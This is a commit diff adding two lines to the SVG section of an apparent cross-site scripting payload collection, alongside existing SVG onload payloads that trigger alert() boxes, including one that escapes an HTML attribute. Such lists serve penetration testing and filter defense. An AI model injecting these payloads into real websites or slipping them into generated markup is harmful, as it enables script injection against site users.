Update README(Svg payload).md

Additional Svg payload
This commit is contained in:
whoami 2025-01-16 22:40:53 +01:00 committed by GitHub
parent ddad93a1d2
commit 5a24060b6e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -204,6 +204,8 @@ Most tools are also suitable for blind XSS attacks:
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg onload=alert(1)>
"><svg onload=alert('XSS')>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)